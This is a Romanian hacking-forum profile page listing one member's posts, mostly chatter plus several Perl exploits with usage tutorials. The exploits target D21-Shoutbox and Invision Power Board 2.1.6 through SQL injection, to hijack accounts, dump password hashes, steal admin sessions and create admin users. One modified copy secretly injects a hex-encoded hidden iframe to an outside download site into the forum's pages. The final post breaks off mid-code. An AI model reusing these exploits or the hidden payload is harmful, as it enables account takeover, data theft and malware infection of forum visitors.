Jump to content

Screech

Active Members
 View Profile  See their activity

  • Posts

    503

  • Joined

  • Last visited

    Never

 Content Type 

Everything posted by Screech

  1. Screech
    <div class='quotetop'>QUOTE("RaXoR")</div> "eu nu am gagica, nu folosesc Very Happy" Ce tare )[/quote:e416a0f356] Ce asa tare ma? Pai eu sunt om ocupat, am afaceri de milioane de dolari . Nu stau sa-mi manance femeile banii :@ :@ :@ :@ nos si ce faci tu cu gagica ta ma?
  2. Screech
    muaaaa, thanks Kw3[R]Ln, u are my man
  3. Screech
    <div class='quotetop'>QUOTE("Sad_Dreamer")</div> ridica-te
  4. Screech
    Mare, 5 degete, niste forme ciudate, fara par, unghii destul de dragute... e vorba de dreapta ma ) , glumesc ma , eu nu am gagica, nu folosesc cine are timp si de din astea?
  5. Screech
    <div class='quotetop'>QUOTE("Kw3[R)</div> Sunt virgin, cine ma f_te? asta e statusul lui kwerln
  6. Screech

    Yoooooooooo

    Screech replied to micutzu's topic in Bine ai venit

    Bine ai venit micutzu, asteptam sa vedem ce sti
  7. Screech
    http://www.rosecurityteam.net/home/viewtop...&highlight=hexa
  8. Screech
    <div class='quotetop'>QUOTE("bossjuan")</div> pai ce faci mai ghici, ne pui sa ghicim?
  9. Screech
    Bun venit NakshatraS, dupa avatar/semnatura imi dai impresia de un hacker inascut, sper sa nu ma insel
  10. Screech
    si tutorialul video unde e?
  11. Screech
    Calmi mai baieti, ca doar sunteti "colegi" de forum, are vreun rost sa va certati? Indiferent daca Sad_Dreamer a facut ceva nu trebuie luat asa, daca aveati dovezi solide ca ar fi fost el mai zic sa-i spuneti ceva, dar asa...
  12. Screech
    <div class='quotetop'>QUOTE("ghici")</div> nu-s de acord cu tine LAMERII VOR FAIMA SI GLORIE! hackerii vor.... citeste prima pagina despre hacker[/quote:a8054b962f] eu ma refeream mai mult la felul meu de a gandi...
  13. Screech
    frumos PsYKid, desi background-ul nu prea se potriveste (parerea mea), dar eu zic ca-i invers hackerii vor faima si glorie nu bani
  14. Screech
    Exploit: ################################################ #!/usr/bin/perl # # D21-Shoutbox v1.1 Exploit Admin Password Change # # Author: Synsta # # Usuage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431 # # Orginal Exploit Found by Windak & langtuhaohoa # ################################################ use HTTP::Cookies; use LWP 5.64; use HTTP::Request; # variables my $login_page = '?act=Login&CODE=01'; my $id = ''; my $table_fix = ''; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $i; my $j; # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp; # init the cookie jar $ua->cookie_jar ($cj); # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST"; # get user input print 'Shoutbox URL (ex: forumurl.com/forum): '; chomp (my $base_url = <STDIN>); print 'Your Username: '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your Password: '; # systems without stty will error otherwise my $stty = -x '/bin/stty'; system 'stty -echo' if $stty; # to turn off echoing chomp (my $pass = <STDIN>); system 'stty echo' if $stty; # to turn it back on print "n" if $stty; print 'ID:'; # it'll say next to one of their posts chomp (my $id = <STDIN>); print 'Table prefix (ex: ibf_): '; chomp ( my $table_fix = <STDIN>); if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' } do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]); } while ($tries-- && !$resp->is_success()); # did we get 200 (OK) ? if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } # was the pass right ? if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.n"; } $| = 1; print "nAttempting to extract validation key from the database...n "; $sql = "?act=Shoutbox&view=mycp?=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*"; $resp = $ua->get ($base_url . $post_pm_page . $sql ); if (!$resp->is_success()) { print "ERROR" ; } else { print "" ; #print $resp->content; $rs=$resp->content; if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "nValidation Key: "; print $1 ; print "n nAuthor: Synstan"; print "Website: w4ck1ng.comn"; print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431n"; } else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;} } <STDIN>;[/list:u] Tut: 1.Du-te in forumul unde e instalat shoutbox-ul, acum click pe formul I've forgotten my password! Click here! pune nicul celui care vrei sa-i schimbi parola si codul si apasa Proceed 2. Ruleaza exploitul 3. Acum veti primi Validation Key, acum du-te la formul de validare (site/forum/index.php?act=Reg&CODE=lostpassform de obicei), pune id-ulvictimei, key-ul... si ai schimbat parola
  15. Screech
    Bun: #!/usr/bin/perl ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC ## Modified Validating Exploit By 3l3ctr1c ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 ## http://rst.void.ru/papers/advisory41.txt ## tested on 2.1.3, 2.1.6 ## ## 08.06.06 ## ©oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "IPB 2.1.6 Validating By 3l3ctr1c. True Credits : RST/GHC" ); $mw->geometry ( '420x550' ) ; $mw->resizable(0,0); $mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 Validating Exploit. ORIGINAL By RST/GHC : ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => '')->pack(); $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = 'http://server/forum/index.php'; $user_id = '1'; $prefix = 'ibf_'; $table = 'members'; $column = 'member_login_key'; $new_admin_name = 'rstghc'; $new_admin_password = 'rstghc'; $new_admin_email = 'billy@Mcft.com'; $report = ''; $group = 4; $curr_user = 0; $rand_session = &session(); $use_custom_fields = 0; $custom_fields = 'name1=value1,name2=value2'; $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $b2 = $fright->BrowseEntry( -command => &update_columns, -relief => "groove", -variable => $table, -font => '{Verdana} 8'); $b2->insert("end", "members"); $b2->insert("end", "validating"); $b2->pack( -side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8'); $b->insert("end", "member_login_key"); $b->insert("end", "name"); $b->insert("end", "ip_address"); $b->insert("end", "legacy_password"); $b->insert("end", "email"); $b->pack( -side => "top" , -anchor => 'w' ); $fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label ( -text => ' ')->pack(); $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => $curr_user)->pack(-side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => ' ')->pack(); $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => $use_custom_fields)->pack(-side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fright->Button(-text => 'Test forum vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &test_vuln )->pack(); $fright->Button(-text => 'Get database tables prefix', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_prefix )->pack(); $fright->Button(-text => 'Get data from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_data )->pack(); $fright->Button(-text => 'Get admin session', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_admin )->pack(); $fright->Button(-text => 'Create new admin', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &create_admin )->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => 'Validating Hash MOd by 3l3ctr1c', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'www.h4cky0u.org', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'Original C0ding By : 1dt.w0lf ', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack(); MainLoop(); sub update_columns() { $b->delete(0,"end"); if($table eq 'members'){ $column = "member_login_key"; $b->insert("end", "member_login_key"); $b->insert("end", "name"); $b->insert("end", "ip_address"); $b->insert("end", "legacy_password"); $b->insert("end", "email"); } elsif($table eq 'validating'){ $column = "vid"; $b->insert("end", "vid"); $b->insert("end", "vid"); $b->insert("end", "vid"); } } sub get_admin() { $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK wrote: ); if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } else { $sql = ''; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*"); $error = 0; $rep = ''; if($res->is_success) { if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; } if($rep =~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $session_ip_address = $rep; } else { $error = 1; } if(!$error) { $rep = ''; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; $session_id = $rep; } else { $error = 1; } if(!$error){ if($curr_user != 1) { $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $session_user_id = $3; } } else { $session_user_id = $user_id; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $group = $3; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $name = $3; } } $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack; $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } if($error) { $InfoWindow->add('Label', -text => 'Can't get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } sub get_data() { $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK wrote: ); if($table eq 'members') { $id_text = 'id'; } if($table eq 'validating') { $id_text = 'member_id'; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*"); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/){ $report = $3; } else { $InfoWindow->add('Label', -text => 'Can't get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } sub create_admin() { $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK wrote: ); if($session_id eq '' || $session_ip_address eq '') { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack; } elsif($session_ip_address !~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack; } else { $xpl = LWP::UserAgent->new( ) or die; ($url2 = $url) =~ s/index.php/admin.php/; $cf = ''; %fields = ( 'code' => 'doadd', 'act' => 'mem', 'section' => 'content', 'name' => $new_admin_name, 'password' => $new_admin_password, 'email' => $new_admin_email, 'mgroup' => $group, ); if($use_custom_fields) { @cf = split(',',$custom_fields); foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;} } $res = $xpl->post($url2."?adsess=$session_id", [ %fields, ], 'USER_AGENT'=>'', 'CLIENT_IP'=>"$session_ip_address", 'X_FORWARDED_FOR'=>"$session_ip_address"); $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E'; $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")"; $res = $xpl->post($url2."?adsess=$session_id", [ 'code' => 'runsql', 'act' => 'sql', 'section' => 'admin', 'query' => $query, ], 'USER_AGENT'=>'', 'CLIENT_IP'=>"$session_ip_address", 'X_FORWARDED_FOR'=>"$session_ip_address"); $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub test_vuln() { $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK wrote: ); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*"); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; } if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub get_prefix() { $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK wrote: ); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'"); if($res->is_success) { $rep = ''; if($res->as_string =~ /FROM (.*)sessions/) { $prefix = $1; $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; } else { $InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub session() { return 'r57ipb216_for_IDS'; } # milw0rm.com [2006-07-14][/list:u]
  16. Screech
    Exploit: #!/usr/bin/perl ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 ## http://rst.void.ru/papers/advisory41.txt ## tested on 2.1.3, 2.1.6 ## ## 08.06.06 ## ©oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "r57ipb216gui" ); $mw->geometry ( '420x550' ) ; $mw->resizable(0,0); $mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); $mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => '')->pack(); $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = 'http://server/forum/index.php'; $user_id = '1'; $prefix = 'ibf_'; $table = 'members'; $column = 'member_login_key'; $new_admin_name = 'rstghc'; $new_admin_password = 'rstghc'; $new_admin_email = 'billy@microsoft.com'; $report = ''; $group = 4; $curr_user = 0; $rand_session = &session(); $use_custom_fields = 0; $custom_fields = 'name1=value1,name2=value2'; $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $b2 = $fright->BrowseEntry( -command => &update_columns, -relief => "groove", -variable => $table, -font => '{Verdana} 8'); $b2->insert("end", "members"); $b2->insert("end", "members_converge"); $b2->pack( -side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8'); $b->insert("end", "member_login_key"); $b->insert("end", "name"); $b->insert("end", "ip_address"); $b->insert("end", "legacy_password"); $b->insert("end", "email"); $b->pack( -side => "top" , -anchor => 'w' ); $fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label ( -text => ' ')->pack(); $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => $curr_user)->pack(-side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => ' ')->pack(); $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => $use_custom_fields)->pack(-side => "top" , -anchor => 'w'); $fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fright->Button(-text => 'Test forum vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &test_vuln )->pack(); $fright->Button(-text => 'Get database tables prefix', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_prefix )->pack(); $fright->Button(-text => 'Get data from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_data )->pack(); $fright->Button(-text => 'Get admin session', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_admin )->pack(); $fright->Button(-text => 'Create new admin', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &create_admin )->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => '©oded by 1dt.w0lf', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack(); MainLoop(); sub update_columns() { $b->delete(0,"end"); if($table eq 'members'){ $column = "member_login_key"; $b->insert("end", "member_login_key"); $b->insert("end", "name"); $b->insert("end", "ip_address"); $b->insert("end", "legacy_password"); $b->insert("end", "email"); } elsif($table eq 'members_converge'){ $column = "converge_pass_hash"; $b->insert("end", "converge_pass_hash"); $b->insert("end", "converge_pass_salt"); $b->insert("end", "converge_email"); } } sub get_admin() { $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK wrote: ); if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } else { $sql = ''; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*"); $error = 0; $rep = ''; if($res->is_success) { if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; } if($rep =~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $session_ip_address = $rep; } else { $error = 1; } if(!$error) { $rep = ''; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; $session_id = $rep; } else { $error = 1; } if(!$error){ if($curr_user != 1) { $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $session_user_id = $3; } } else { $session_user_id = $user_id; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $group = $3; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res->as_string 